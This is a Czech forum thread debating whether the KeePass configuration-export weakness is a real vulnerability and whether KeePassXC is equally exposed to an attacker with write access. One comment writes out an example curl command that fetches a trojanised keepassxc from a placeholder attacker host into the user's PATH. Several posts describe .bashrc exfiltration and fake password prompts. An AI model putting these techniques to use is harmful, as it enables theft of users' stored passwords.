Vlákno názorů k článku Postřehy z bezpečnosti: nedobrovolný open-source nebo zaplacení výkupného od Ratbatcat - Ad keepass: NOTE: the vendor's position is that...

  • Článek je starý, nové názory již nelze přidávat.
  • 6. 2. 2023 1:41

    Ratbatcat

    Ad keepass: NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.
    Ja mel za to, ze vsechny ty pbkdf2, aes a ostatni jsou tam prave od toho aby zamezili ziskani hesel v pripade ze ma utocnik pristup k te databazi. Pletl jsem se, keepass autori rikaji ze ta databaze neni zamyslena byt bezpecna. Keepass tedy skrtam se zeznamu pouzivanych aplikaci diky ignoranstvi autoru.

  • 6. 2. 2023 8:00

    tzl

    Je rozdíl mít čtecí přístup k databázi a nebo read/write do systému kde se pohybuje (a zadává heslo) uživatel oprávněný k datům přistupovat.

  • 6. 2. 2023 8:03

    NikdeKde

    Ty jsou tam proto aby při získání souboru bylo obtížné získat hesla, pokud ale útočník má možnost měnit soubory na disku a následně uživatel na takovém systému pracuje tak to už tě nezachrání ani svěcená voda.

  • 6. 2. 2023 8:43

    Ratbatcat

    Typicky utocnik nechce porizovat snimky obrazovkg ani instalovat nejaky keylogger, typicky utocnik chce ziskat co nejvice pristupu a dat s nejmensi snahou. Proc delat veci slozite. Pokud mam jako utocnik k dispozici pro zapis pres sit C: nejakeho stroje tak muzu instalovat cokoliv ale proc bych to delal kdyz mi staci pockat az me keepass zapise vsechny hesla do textaku? Sdileni C: neni nic vyjimecneho. A jiz je k dispozici kod ktery hleda na systemech keepass soubory a modifikuje konfiguraci aby dostal z nich plaintext. Keyby to nebyla zranitelnost tak nikdo tenhle kod nepise.

  • 6. 2. 2023 12:29

    SPM

    No tak tam po té síti místo upraveného XML konfiguračního souboru nahraje upravenou binárku KeePassu, která ty hesla po otevření pošle do pryč úplně stejně. Náročnost ve chvíli, kdy to někdo takhle jednou upraví, je úplně stejná...

    (Osobně bych navrhoval jít radši sepsat CVE na to, že operační systémy od jedné nejmenované firmy mají ten síťový sharing defaultně puštěný a otevřený tam, kde ani vůbec není potřeba...)

  • 6. 2. 2023 15:23

    Filip Jirsák
    Stříbrný podporovatel

    Ve skutečnosti se ho to týká. Útočník může uživateli podstrčit upravený KeePassXC, který bude mít implementovanou stejnou funkci exportu, jako má KeePass.

  • 6. 2. 2023 16:07

    dw

    To sa ale netyka len KeePass* ale aj akeho kolvek ineho programu. Naviac casto ani netreba nieco podstrcit, mnoho ludi si to zavlecu sami, spolu s crackom pre sw za ktory sa im nechce platit.

  • 6. 2. 2023 16:24

    K>

    Netyka.
    Podstrcit binarku, to je problem uplne kazdeho programu. Tady se ale resi jedna konkretni funkce konfiguraku jednoho konkretniho programu KeePass, a tahle funkce v KeePassXC proste neni.

  • 6. 2. 2023 21:57

    Filip Jirsák
    Stříbrný podporovatel

    Právě proto, že je to problém úplně každého programu, tak je to i problém KeePassXC.

    A nebo – což tvrdí autoři KeePass a mnoho dalších lidí – je to problém toho, že útočník může v uživatelově systému přepisovat libovolný soubor. A tedy to není problém nějakého konkrétního postiženého programu, ale je to problém toho programu, který ten zápis umožnil (což není KeePass).

    Tedy existují dva pohledy na věc, ale v žádném z nich to není problém výhradně KeePass.

  • 6. 2. 2023 22:56

    K>

    A ja myslim, ze tady se vsichni krome vas bavi o tom jednom konkretnim problemu zmeny konfiguracniho souboru, a jen vy tady porad lezete s obecnym problemem zmeny binarky.

    Mimochodem, napriklad u mne je konfiguracni soubor v mem uzivatelskem adresari, narozdil od binarky kterou smi upravovat jen root, takze to je nejaka obtiz navic. Jo jasne, jsou zpusoby jak to obejit, ale to uz zase vyzaduje nejake veci navic, a tedy to lze povazovat za jiny zpusob utoku, a o tom se tu nikdo krome vas nebavi, protoze se resi prave ten jeden problem konfiguraku.

    No ale vsadim boty ze to s vama nebude tak jednoduche.

  • 7. 2. 2023 2:37

    k3dAR
    Stříbrný podporovatel

    @K>

    je vhodne si uvedomit, ze tve "binarky kterou smi upravovat jen root, takze to je nejaka obtiz navic" pro pripadneho utocnika co ma zapis "jen" do tveho home, znamena takovouto "obtiz":

    curl https://utocnik.web/getpassxc --create-dirs -o ~/.local/bin/ke­epassxc

    ale samozrejme ze s keepass to ma jednodusi, ze nemusi vytvaret/hledat zakernou modifikaci, protoze mu staci zmenit conf a vyexportuje se do plaintextu, takze si jen do .bashrc prida poslani souboru na sve ftp :)
    takze bych nad tim oci nezaviral, zaroven ale je nezaviral obecne nad tim ze utocnik s zapisem do $HOME je problem uz sam o sobe...

  • 7. 2. 2023 8:15

    Filip Jirsák
    Stříbrný podporovatel

    K>: Já se vám snažím celou dobu vysvětlit, že ten váš „jeden konkrétní problém“ není žádný problém. Což zjistíte, když se na to podíváte v souvislostech. Pak totiž zjistíte, že je to jen speciální případ úplně jiného problému, který nespočívá v chování jedné aplikace, ale v tom, že útočník má právo zápisu jako přihlášený uživatel.

    Původní binárku sice smí spravovat jen root, jenže do vašeho domovského adresáře může útočník zapsat jinou verzi aplikace, konfigurační skripty shellu, ve kterých se definují cesty k prohledávání jsou zapsané ve vašem domovském adresáři, konfiguraci DE (třeba ikony na ploše) jsou také zapsané ve vašem domovském adresáři.

  • 7. 2. 2023 13:40

    K>

    Jojo, klasicka Jirsakovina. Nekdo se zepta zda problem A programu X plati i pro program Y. Jirsak rekne ze ano, protoze problem H. Kdyz napisu ze resime A, ale neresime H, tak Jirsak se zacne vykrucovat a tvrdit ze A neni problem, protoze A je podmnozina H. Coz ale neni, uz jen proto ze program Y ten problem nema. Pricemz to vidi to kazdy krome Jirsaka.
    Fakt nechapu, proc ma Jirsak problem pochopit, ze na utok typu A staci uprava textaku, na utok typu H potrebuju prepsat zdrojak a zkompilovat ho. Utok A zvladne kazde schopnejsi decko nebo trochu lepsi BFU, utok H uz ne.

    A ted mi to vysvetlis znova dokola, protoze musis mit posledni slovo, ze ano? No tak prosim.

  • 7. 2. 2023 15:22

    Filip Jirsák
    Stříbrný podporovatel

    Ne, to co jste napsal, je vnitřně sporné. To, co tvrdím já, je to, že tenhle problém mají všechny programy, takže je zbytečné to řešit jenom u programu X, když se to úplně stejně týká i programu Y a všech ostatních programů.

    Všichni kromě vás vidí, že útočník, který má právo zápisu do uživatelova domovského adresáře, tam může uložit svou vlastní upravenou verzi KeePassXC, upraví startovací skripty tak, aby uživatel spustil tuto upravenou verzi.

    Takže celý problém je jenom v tom, že vaše tvrzení „programy Y ten problém nemá“ je nepravdivé.

    Znovu dokola bych vám to nemusel vysvětlovat, kdybyste to ráčil pochopit hned napoprvé.

  • 7. 2. 2023 22:44

    K>

    Fakt nepochopim, ze je pro nekoho tak tezke pochopit rozdil mezi "uprava textoveho konfiguraku" versus "vymena binarky".

  • 7. 2. 2023 23:14

    Filip Jirsák
    Stříbrný podporovatel

    K> Ano, to je vidět celou dobu, že nechápete, v čem spočívá podstata problému. Vůbec nejde o to, že by v tom nebyl nějaký rozdíl. Není v tom rozdíl z hlediska zabezpečení, protože kdo může upravit textový konfigurák, může i vyměnit binárku.

  • 8. 2. 2023 11:10

    K>

    Jasne, neni v tom rozdil.... Anebo jo? Proc teda antiviry scanuji binarky, kontroluji hashe binarek, ale nekontroluji obsah textovych konfiguraku? Ze by mezi binarkama a textakama prece jen byl nejaky nepatrny rozdil?

  • 8. 2. 2023 12:49

    Filip Jirsák
    Stříbrný podporovatel

    K>: Když napíšu „je v tom rozdíl“, vaše polemika „jasně, není v tom rozdíl“ vypadá dost hloupě. Zkuste příště polemizovat s tím, co jsem napsal, ne s pravým opakem.

  • 8. 2. 2023 15:08

    K>

    Tomu se rika ironie, ale asi to nechame byt, to bych vam nedokazal vysvetlit ani za milion let. Moc komplikovane.
    No a co, proc teda antiviraky resi binarky a neresi textove konfiguraky?

  • 8. 2. 2023 17:33

    Filip Jirsák
    Stříbrný podporovatel

    K> Vaše vtipnost je bohužel zastíněna tím, že jste můj komentář očividně nepochopil. Já jsem vaši ironii prokoukl – problém je v tom, že ta ironie byla zároveň i hloupost. Protože jste se ironicky vymezoval proti opaku toho, co jsem já napsal. Já jsem napsal: „Je to bílé.“ Vy jste na to ironicky odpověděl: „Tak vy tvrdíte, že je to černé?“ Už to chápete?

    Antiviráky řeší třeba wordovské dokumenty, PDF, JavaScriptové soubory, HTML soubory, shell skripty – připadá vám to jako binárky?

    Ale když máte pocit, že antiviry neřeší textové konfiguráky, tak asi textové konfiguráky nemohou být nebezpečné. Měl jsem pocit, že se snažíte dokazovat, že textový konfigurák KeePassu nebezpečný být může, ale bůhví, jestli vůbec existuje osoba, která tuší, co se vlastně snažíte dokazovat.

  • 9. 2. 2023 8:12

    Ctrl+P

    jestli vůbec existuje osoba, která tuší, co se vlastně snažíte dokazovat.
    Filip Jirsák: Nechci vám do vaší plodné diskuze zasahovat, ale dle počtů lajků si myslím, že existují osoby, které nejen tuší, co se K snaží dokazovat, ale dokonce s ním i souhlasí, narozdíl od těch 0 osob, co souhlasí s vámi.

    9. 2. 2023, 08:14 editováno autorem komentáře

  • 9. 2. 2023 8:23

    K>

    Filip Jirsák:
    Tak tu nechme stranou, ironie byla asi prilis matouci. Vratme se k vasi vete:
    "Není v tom rozdíl z hlediska zabezpečení,"
    No, ale o to tu prece vubec nejde. Tohle diskuzni vlakno obsahovalo jednu dulezitou vetu od Kicko:
    "Vieme, ze sa to KeePassXC netyka?"
    Vzhledem k obsahu clanku je jasne, ze Kicko mel pod slovem "to" na mysli problem Keepass, kdy zmenou konfiguraku se vypisou hesla do souboru.
    Vy jste na to jasne reagoval:
    "Ve skutečnosti se ho to týká."
    Ale KeepassXC nema tu vlastnost, ze zmenou konfiguraku se hesla vypisou do databaze.
    Takze stale je nepochopitelne, proc tady tahate zamenu binarky, kdyz se vsichni bavi o zmene konfiguraku.
    A stale ignorujete problem, ze zamena binarky je mnohem tezsi nez zamena konfiguraku, protoze upravit textak je snazsi nez preprogramovat binarku.

    Ctrl+P:
    doopravdy ja se uz nesnazim nic dokazovat, me je jasne ze problem je zrejmy vsem krome Jirsaka. Ja ted jen zkousim jestli je mozne mit v diskuzi s Jirsakem posledni slovo. Naposledy jsem to zkousel cca 1,5 roku zpatky a neuspel jsem. Ted delam druhy pokus.

  • 9. 2. 2023 8:29

    Filip Jirsák
    Stříbrný podporovatel

    Ctrl+P: Zkuste zvážit variantu, že existují osoby, které lajkují cokoli, co napíše někdo v diskusi, kdo je proti mně (nebo některým dalším diskutujícím). Poznáte je například tak, že když se zapojí do diskuse, nikdy nekomentují věcnou stránku, vždycky jenom osobu.

    Momentálně K> statečně oponuje tvrzení, že binárka je to samé, jako textový soubor. Má to jenom jednu drobnou vadu – nic takového tu nikdo netvrdil. Že to někdo lajkuje není můj problém.

  • 9. 2. 2023 14:28

    K>

    Takze souhlasite s tvrzenim, ze ten problem co ma Keepass (uprava konfiguraku vede k vypisu databaze) se netyka KeePassXC?

  • 9. 2. 2023 17:18

    Filip Jirsák
    Stříbrný podporovatel

    K> Ne, nesouhlasím. Problém, že když má útočník právo přepisovat soubory používané aplikací, může aplikaci zmanipulovat k nebezpečnému chování, se totiž týká prakticky všech aplikací.

    Žádný problém „úprava konfiguráku vede k výpisu databáze“ reálně neexistuje, protože útočník obvykle nemá možnost jenom upravit konfigurák KeePassu, ale v dané situaci bude mít daleko větší možnosti.

    Je to jako kdybyste se u baráku bez alarmu, bezpečnostních oken a dveří s obyčejným zámkem neustále točil na tom, že je obrovský problém to, že se dovnitř může dostat zloděj oknénkem na záchodě. A přitom byste ignoroval fakt, že stejně tak se může dovnitř dostat i oknem v koupelně, které je hned vedle, dalšími deseti okny v dalších místnostech, vstupními dveřmi a balkonovými dveřmi.

    Problém vašeho přístupu je v tom, že špatně definujete problém, a pak se proti němu nedokážete bránit.

    Vy si asi ve své neznalosti představujete, že vývojáři KeePassu mají vydat novou verzi, která funkci exportu nebude mít. Jenže už vás nenapadlo, co udělá útočník. Útočník vezme současnu verzi KeePassu, nahraje na uživatelův disk (kam může zapisovat), upraví jeho .bashrc a .zshrc (kam může zapisovat) tak, aby měl uživatel jako první v cestě upravenou verzi KeePassu – a jste tam, kde jste byl. Škoda, že jste místo nesmyslných komentářů nepřemýšlel o tomhle – mohlo to napadnout i vás. A pokud byste snad chtěl argumentovat tím, že je to složitější, než upravit jeden konfigurák – ne o mnoho. Mnohem složitější je získat ta oprávnění pro zápis. (Nepomůžou ani ochrany jako noexec, kdyby to někdo náhodou měl všude, kam může uživatel zapisovat. Útočníkovi stačí zobrazit výzvu pro zadání hesla, pak vypíše „sorry, chybné heslo“ a nastartuje původní aplikaci. To zvládne napsat třeba v Pythonu, což je – slovy K> – obyčejný textový soubor, žádná binárka.)

  • 10. 2. 2023 12:29

    K>

    To je vazne vtipne.
    " problém „úprava konfiguráku vede k výpisu databáze“ reálně neexistuje"
    Nemusime to nazyvat problemem, muzeme to nazyvat funkci, a tahle funkce existuje, to doufam nepoprete.

    Takze dotaz preformuluju:
    Souhlasite s tvrzenim, ze ta funkce, co ma Keepass (uprava konfiguraku vede k vypisu databaze) se netyka KeePassXC?

    To ze utocnik muze podstrcit binarku jsem zminil nekolikrat. Ocividne jste si toho vsiml, kdyz pisete cim bych posleze argumentoval.

    Pro vas mozna neni zkompliovat binarku o mnoho slozitejsi nez upravit textak, ale kdyz ja se podivam kolem sebe, tak vidim 2 lidi co umi zkompliovat binarku, a 20 lidi co to neumi (ale umi upravit textak). Mozna byste mohl taky premyslet o celem svete, ne jenom o tom ve vasi hlave.
    No a tech 20 lidi si je schopno zajistit pristup k souborum v cizim pocitaci, ale binarku nebudou schopni zkompilovat ani do konce sveho zivota.

    A tedy, jelikoz existuji lide, kteri umi podstrcit konfigurak, a neumi podstrcit binarku (a navic zmeny binarky hlida antivir), tedy existuje vice lidi, kteri jsou schopni ziskat hesla z KeePass, nez lidi co jsou schopni ziskat hesla z KeePassXC. A to je ten duvod, proc danou vlastnost KeePass nekteri lide vnimaji jako bezpecnostni problem.

    Analogii o domecku komentovat nebudu, analogie jsou nahouby, jak jste sam mnohokrat napsal.

  • 10. 2. 2023 12:52

    Filip Jirsák
    Stříbrný podporovatel

    Nemusime to nazyvat problemem, muzeme to nazyvat funkci, a tahle funkce existuje, to doufam nepoprete.
    Ne, to nepopírám.

    Souhlasite s tvrzenim, ze ta funkce, co ma Keepass (uprava konfiguraku vede k vypisu databaze) se netyka KeePassXC?
    Ano, souhlasím.

    Udělám malou odbočku – víte o tom, že běžně používané shelly (třeba Bash, Zsh) používají textové konfigurační soubory (ve skutečnosti jsou to skripty v tom shellu, ale ve vaší terminologii je to textový konfigurák), které se spouštějí při spuštění shellu? A že tyto konfigurační soubory umožňují spustit cokoli, co jde spustit ze shellu? Takže tam třeba můžete dát příkaz, který smaže všechny soubory, které uživatel smazat může? Tedy „úprava konfiguráku vede ke smazání všech souborů uživatele“.

    Neměl byste to nahlásit jako CVE?

    Pro vas mozna neni zkompliovat binarku o mnoho slozitejsi nez upravit textak, ale kdyz ja se podivam kolem sebe, tak vidim 2 lidi co umi zkompliovat binarku, a 20 lidi co to neumi (ale umi upravit textak). Mozna byste mohl taky premyslet o celem svete, ne jenom o tom ve vasi hlave.
    O celém světě byste měl začít přemýšlet vy. Útočník nemusí žádnou binárku kompilovat – to udělá jeden člověk, který tomu rozumí, ostatní ji jenom použijí. Tak, jako je to v ostatních případech. Vy jste si myslel, že si útočníci a script-kiddies všechno píšou sami akompilují ze zdrojových kódů?

    No a tech 20 lidi si je schopno zajistit pristup k souborum v cizim pocitaci, ale binarku nebudou schopni zkompilovat ani do konce sveho zivota.
    Ne, získat právo zápisu do konfiguračních souborů jiného uživatele je řádově složitější, než stáhnout a někam nahrát existující binárku. Dokonce i než podle návodu přeložit existující zdroják a vytvořit tak binárku. Kdyby to tak nebylo, tak se vám po vašich datech neustále prohánějí cizí uživatelé.

    A tedy, jelikoz existuji lide, kteri umi podstrcit konfigurak, a neumi podstrcit binarku (a navic zmeny binarky hlida antivir), tedy existuje vice lidi, kteri jsou schopni ziskat hesla z KeePass, nez lidi co jsou schopni ziskat hesla z KeePassXC. A to je ten duvod, proc danou vlastnost KeePass nekteri lide vnimaji jako bezpecnostni problem.
    Ano, existují lidé, kteří nechápou počítačovou bezpečnost a snaží se ji řešit způsobem „tady mám řešení a teď zkusme najít tak neschopného útočníka, že ho to zastaví“. Typický je právě ten váš přístup – předpokládají útočníka, který je docela schopný (dokázal získat právo zápisu do dat cizího uživatele), a pak se zřejmě útočník praští do hlavy a nedokáže do systému ani nahrát binárku staženou z internetu.

    Analogii o domecku komentovat nebudu, analogie jsou nahouby, jak jste sam mnohokrat napsal.
    Nic takového jsem nikdy nenapsal. Analogie jsou na houby, pokud se z ní snažíme odvozovat něco, co přeshuje rámec té analogie. V tomto případě ta analogie funguje, protože ukazovala jenom to, že nemá smysl lepit jednu díru, když máte vedle tisíce stejných děr.

    Ale pokud pro vás osobně je binárka nepřekonatelný problém (já jsem teda psal i o Python skriptu, což není binárka…), tak se zaměřte na ty konfigurační soubory shellu. To jsou texťáky.

  • 10. 2. 2023 23:09

    K>

    Vyborne, ted jste napsal:
    "Ano, souhlasím."
    Takze chapete, ze KeePassXC nema danou funkci. A tedy vase odpoved:
    "Ve skutečnosti se ho to týká. "
    na Kickovu vetu:
    "Vieme, ze sa to KeePassXC netyka?"
    Byla rozporna s tim co pisete ted. Kicko se jasne ptal na funkci KeePass, kdy uprava konfiguraku vede k vypisu hesel. Kicko se bezpochyby neptal na obecny problem podvrhnuti binarky.

    Tak to proste priznejte, misto vaseho
    "Ve skutečnosti se ho to týká."
    jste mel napsat:
    "KeePassXC se to netyka, ale je to irelevantni protoze podvrhnout binarku je (v pripade jiz pristupneho disku s uziv. daty) snadne".

    Jak jednoduche by bylo priznat chybu, a neprit se kvuli kazde blbine 50+ prispevku. Jenze to je ten vas problem, nedokazate nemit posledni slovo, nedokazate pochopit a pripadne prijmout fakta a nazory jine nez vase. Kdybyste mel tenhle problem jen se mnou, mohl bych si to same myslet prave o sobe. Jenze tyhle sahodlouhe diskuze na rootu jste mel s mnoha ruznymi lidmi.

    "Neměl byste to nahlásit jako CVE?" - ne, proc bych to delal? Nejak jste si vyprojektoval, ze povazuji funkci keepass jako neco hodneho CVE nebo co? To jste si vyprojektoval blbe.

    " Útočník nemusí žádnou binárku kompilovat – to udělá jeden člověk, který tomu rozumí, ostatní ji jenom použijí. " - ano, to se muze stat. Ale co se tyce tech 20 lidi kolem me, ti si nekde prectou o problemu keepass, ale uz nezvladnou najit na netu predem pripraveny malware.

    "Ne, získat právo zápisu do konfiguračních souborů jiného uživatele je řádově složitější, než stáhnout a někam nahrát existující binárku." - Jak kdy, jak kde. Staci si uvedomit, ze vetsina lidi ani nezamyka sve pocitace kdyz od nej odejdou. Napriklad vtipku s podstrcenymi nevhodnymi obrazky na pozadi windowsiho desktopu uz tu bylo nekolik.

    (Musim rict, ze me prekvapuje ze tohle vlakno asi cte i jeste nekdo jiny, a dava palecky nahoru. Cist to musi to byt utrpeni.)

  • 11. 2. 2023 9:01

    Filip Jirsák
    Stříbrný podporovatel

    Vyborne, ted jste napsal:
    "Ano, souhlasím."
    Takze chapete, ze KeePassXC nema danou funkci. A tedy vase odpoved:
    "Ve skutečnosti se ho to týká. "
    na Kickovu vetu:
    "Vieme, ze sa to KeePassXC netyka?"
    Byla rozporna s tim co pisete ted. Kicko se jasne ptal na funkci KeePass, kdy uprava konfiguraku vede k vypisu hesel. Kicko se bezpochyby neptal na obecny problem podvrhnuti binarky.

    Nemyslím si, že by to bylo tak těžké na pochopení, abych vám to musel vysvětlovat po desáté. Vy se stále mylně domníváte, že problém je ve stávajících funkcí konkrétního programu. Jenže tak to není. Cílem útočníka je v tomto případě získání dešifrované databze hesel, nebo šifrované databáze hesel spolu s heslem (což je ekvivalent). Pokud má útočník možnost přepisovat soubory v domovském adresáři uživatele, dokáže ta hesla získat bez toho, že by nějaký nainstalovan program měl tu funkci exportu hesel – prostě si tam přidá vlastní program, který tu funkci mít bude. Takže se to týká úplně všech aplikací, protože v případě, kdy může útočník přepisovat soubory uživatele, může takto zmanipulovat kteroukoli aplikaci.

    Kicko se neptal na funkci aplikace, ptal se na uvedenou „zranitelnost“ – tedy jestli útočník s právem zápisu může aplikaci zmanipulovat k vydání hesel z databáze. A odpověď je „ano, může“.

    KeePassXC se to netyka, ale je to irelevantni protoze podvrhnout binarku je (v pripade jiz pristupneho disku s uziv. daty) snadne
    Proč bych měl psát větu, jejíž druhá část vyvrací první část věty? Já jsem místo toho pravdivě napsal i první část, že se to týká i KeePassXC, a vzápětí jsem vysvětlil, že se to týká všech aplikací, tedy i KeePassXC.

    Jak jednoduche by bylo priznat chybu, a neprit se kvuli kazde blbine 50+ prispevku.
    Tak proč tu chybu nepřiznáte? Už jste pochopil, že útočník v této situaci může nahradit libovolnou aplikaci. Takže stačí udělat dva další kroky – uvědomit si, že v takovém případě může zmanipulovat i KeePassXC, a pak už jen malý krůček – odvodit, že když může zmanipulovat i KeePassXC k vydání hesel, týká se to i KeePassXC.

    Jenze to je ten vas problem, nedokazate nemit posledni slovo, nedokazate pochopit a pripadne prijmout fakta a nazory jine nez vase.
    Nikoli. Problém je v tom, že vy nepíšete fakta, ale zjevné nesmysly. Proto na ty zjevné nesmysly upozorňuju. Jiné názory přijímám. Třeba názor, že automatický export dat při spuštění aplikace bez explicitního potvrzení uživatelem není vhodná funkce. To beru, každý má právo na takový názor, já jsem takový názor nikdy nerozporoval. Rozporuju jen vaše výmysly, které vydáváte za fakta – přitom to jsou zjevně nepravdivá tvrzení. Přestaňte psát nesmysly a já je nebudu vyvracet. https://xkcd.com/386/

    Kdybyste mel tenhle problem jen se mnou, mohl bych si to same myslet prave o sobe. Jenze tyhle sahodlouhe diskuze na rootu jste mel s mnoha ruznymi lidmi.
    Asi nejste v tom psaní nesmyslů a trvání na nich výjimečný. Stavíte se po bok lidí jako mikesznovu, Adolf.Shitler, Lol Phirae, j. Jestli vám to lichotí…

    "Neměl byste to nahlásit jako CVE?" - ne, proc bych to delal?
    Protože je to ekvivalent té „chyby“, o které diskutujeme, a u které obhajujete, že je to bezpečnostní chyba a má na ní být vydáno CVE (kdyby si tedy ještě někdo myslel, že CVE o něčem vypovídá).

    Ale co se tyce tech 20 lidi kolem me, ti si nekde prectou o problemu keepass, ale uz nezvladnou najit na netu predem pripraveny malware.
    Jenže takhle počítačová bezpečnost nefunguje. Počítačová bezpečnost se dělá kvůli těm schopným útočníkům, ne kvůli těm neschopným. Takže se musí obranné mechanismy nastavit tak, aby odolaly i těm, kteří ten malware stáhnout zvládnou.

    Ostraha banky se také nedělá tak, že byste řekl „20 lidí kolem mne by nedokázalo vystřelit, takže banka žádnou ochranu nepotřebuje“.

    Jak kdy, jak kde. Staci si uvedomit, ze vetsina lidi ani nezamyka sve pocitace kdyz od nej odejdou. Napriklad vtipku s podstrcenymi nevhodnymi obrazky na pozadi windowsiho desktopu uz tu bylo nekolik.
    No a v takovém případě má dotyčný možnost stáhnout z internetu nebo z USB flashky příslušný upravený software a nainstalovat ho. A nemusí vůbec ničemu rozumět, prostě stáhne exe, ten se spustí, nainstaluje škodlivou aplikaci, nahradí ikony na ploše a ve Startu a je vymalováno.

    Musim rict, ze me prekvapuje ze tohle vlakno asi cte i jeste nekdo jiny, a dava palecky nahoru. Cist to musi to byt utrpeni.
    Mě zase překvapuje, jakou radost vám dělají vaši fanoušci, kteří vyhledávají utrpení.

  • 13. 2. 2023 8:12

    Ctrl+P

    Mě zase překvapuje, jakou radost vám dělají vaši fanoušci, kteří vyhledávají utrpení.
    Jen proto, že souhlasím s tím, že BFU snadno dokáže zeditovat textový konfigurák, ale je pro něj těžší si obstarat a někomu podstrčit falešnou binárku, jsem masochistický fanoušek K>? Mimochodem pod jinými články zase dávám pro změnu palec nahoru vám, takže teď čí jsem vlastně fanoušek? Zmanipulovat KeePassXC řádně nainstalovaný ve windows v Program Files bude určitě pro BFU o mnoho obtížnější než upravit konfigurák někde v %appdata%. Navíc dobrý antivirák si podvržené binárky pravděpodobně všimne, ale upraveného texťáku težko. I Windows se obvykle ptají, jestli chcete opravdu spustit pochybný exe a pokud se na to běžně u KeePassXC dřív neptal, tak si myslím, že i sebeneopatrnější BFU znejistí...
    Byla jsem zvědavá, jestli budete dál vést svou a K> má pravdu, že nedokážete nemít poslední slovo a proto jsem celou vaší diskuzi až sem četla.

    13. 2. 2023, 08:13 editováno autorem komentáře

  • 13. 2. 2023 8:57

    Filip Jirsák
    Stříbrný podporovatel

    Jen proto, že souhlasím s tím, že BFU snadno dokáže zeditovat textový konfigurák, ale je pro něj těžší si obstarat a někomu podstrčit falešnou binárku, jsem masochistický fanoušek K>?
    Spíš proto, že věříte jeho manipulaci, že tohle je jediný problém v takové situace.

    Mimochodem pod jinými články zase dávám pro změnu palec nahoru vám, takže teď čí jsem vlastně fanoušek?
    Řeč ale nebyla o všech komentářích, ale jenom o komentářích v diskusi, jejíž čtení podle K> způsobuje utrpení.

    Zmanipulovat KeePassXC řádně nainstalovaný ve windows v Program Files bude určitě pro BFU o mnoho obtížnější než upravit konfigurák někde v %appdata%.
    Jenže o manipulaci aplikace v Program Files nebyla řeč.

    Navíc dobrý antivirák si podvržené binárky pravděpodobně všimne, ale upraveného texťáku težko.
    Psal jsem i o jiných možnostech, než je podvržení binárky.

    I Windows se obvykle ptají, jestli chcete opravdu spustit pochybný exe a pokud se na to běžně u KeePassXC dřív neptal, tak si myslím, že i sebeneopatrnější BFU znejistí...
    Windows se neptají na pochybný exe, ale na nepodepsaný exe. A já jsem psal o jiných způsobech napadení, než je exe soubor.

    Byla jsem zvědavá, jestli budete dál vést svou a K> má pravdu, že nedokážete nemít poslední slovo a proto jsem celou vaší diskuzi až sem četla.
    Jak jsem psal, pouze opravuju omyly, které v diskusi zazní. Stejně jako jsem teď opravil vaše omyly. Nepřipadá vám zvláštní, že když jsem popsal různé varianty, co může útočník udělat, vy si vyberete jednu variantu, tu rozporujete – a ostatí jako by neexistovaly? Útočník ale může použít cokoli z toho, co jsem popsal, takže to, že jeden z popsaných druhů útoků je podle vás komplikovaný, neznamená, že neprovede jiný útok.

  • 13. 2. 2023 9:07

    K>

    Ctrl+P: jee, diky za info proc to tu jeste nekdo cte, fakt mi to vrtalo hlavou. Muj dalsi plan je postupne zvysovat hrubost diskuze (v poslednim prispevku viz narazka na alkoholismus jako pocatecni krok). Jsem zvedav kam az budu moci zajit, aby Jirsak nemel posledni slovo.
    Stale me fascinuje, ze i presto ze jsem jasne vyjadril ze mi jde o posledni slovo, Jirsak se diskuze nevzdava a nepolevuje v usili. Je to docela narocny experiment.

  • 13. 2. 2023 10:07

    Filip Jirsák
    Stříbrný podporovatel

    K>: Je pozoruhodné, jak se k tomu sám přiznáváte, že vám vůbec nejde o věc samou, ale jenom o to mít posledí slovo.

  • 13. 2. 2023 9:03

    K>

    Jirsak: Mno, rozepsal jste se hezky. Ale prisoudil jste mi spoustu nazoru ktere jsem tu nenapsal, jen jste si je domyslel. Nejvic me ovsem dostal odkaz na to xkcd. Ten obrazek si dela srandu prave z lidi jako jste vy. A vy to tu jeste sam placnete. Diky za pekne rano, zasmal jsem se od srdce.

    "Nemyslím si, že by to bylo tak těžké na pochopení," - neni to tezke na pochopeni. Vy jen proste odmitate uznat, ze podvrhnout binarku a podvrhnout textovy konfigurak jsou dve ruzne slozite veci.
    Jako u vseho, cim jednodussi je system napadnout, tim vice lidi ma moznost system napadnout, a tim vetsi pravdepodobnost je ze system nekdo napadne.
    Ten priklad s 20 lidma kolem mne slouzi k ukazani, ze je vice lidi co dokazou upravit textak, ale neumi podvrhnout binarku. A vy to demagogicky prevedete na uplne jine tvrzeni ze kdyz nekdo neco neumi, nikdo jiny to neumi.

    "u které obhajujete, že je to bezpečnostní chyba a má na ní být vydáno CVE" - kde? Proboha, kde jsem obhajoval ze na to ma byt vydano CVE? Asi pisu ze spani. Nebo vy u toho psani trochu popijite, co?

    "Počítačová bezpečnost se dělá kvůli těm schopným útočníkům, ne kvůli těm neschopným" - aha, ja myslel ze pocitacova bezpecnost se dela kvuli vsem utocnikum. Tady jste se asi upsal, tak to nebudeme dale rozvijet.

    "má dotyčný možnost stáhnout z internetu nebo z USB flashky příslušný upravený software a nainstalovat ho. " - znovu opakuji, vetsina lidi nema ani poneti, kde by mohli stahnout malware. Narozdil od upravy textoveho souboru...

    "Mě zase překvapuje, jakou radost vám dělají vaši fanoušci, kteří vyhledávají utrpení." - opet. Jak jste prisel na to ze mi delaji radost nejaci fanousci? Ja tu vyjadrim prekvapeni, a vy to prevedete na tvrzeni ze mam radost z nejakych fanousku. No a o tom je kazda jednotliva diskuze s vami. Vy si domyslite hromadu veci a pak vedete tyhle nesmyslne sahodlouhe diskuze, bez relevance k tomu co opravdu bylo napsano a vyjadreno.

    13. 2. 2023, 09:08 editováno autorem komentáře

  • 13. 2. 2023 10:20

    Filip Jirsák
    Stříbrný podporovatel

    Vy jen proste odmitate uznat, ze podvrhnout binarku a podvrhnout textovy konfigurak jsou dve ruzne slozite veci.
    Ano, to odmítám uznat, protože jsem ukázal, že to nejsou dvě různě složité věci a vy jste to nijak nevyvrátil.

    "Počítačová bezpečnost se dělá kvůli těm schopným útočníkům, ne kvůli těm neschopným" - aha, ja myslel ze pocitacova bezpecnost se dela kvuli vsem utocnikum. Tady jste se asi upsal, tak to nebudeme dale rozvijet.
    Neschopné útočníky není potřeba řešit, protože když systém zabezpečíte proti těm schopným, je tím zabezpečen i proti těm neschopným.

    znovu opakuji, vetsina lidi nema ani poneti, kde by mohli stahnout malware. Narozdil od upravy textoveho souboru...
    Co si slibujete od znovuopakování věci, která už byla vyvrácena?

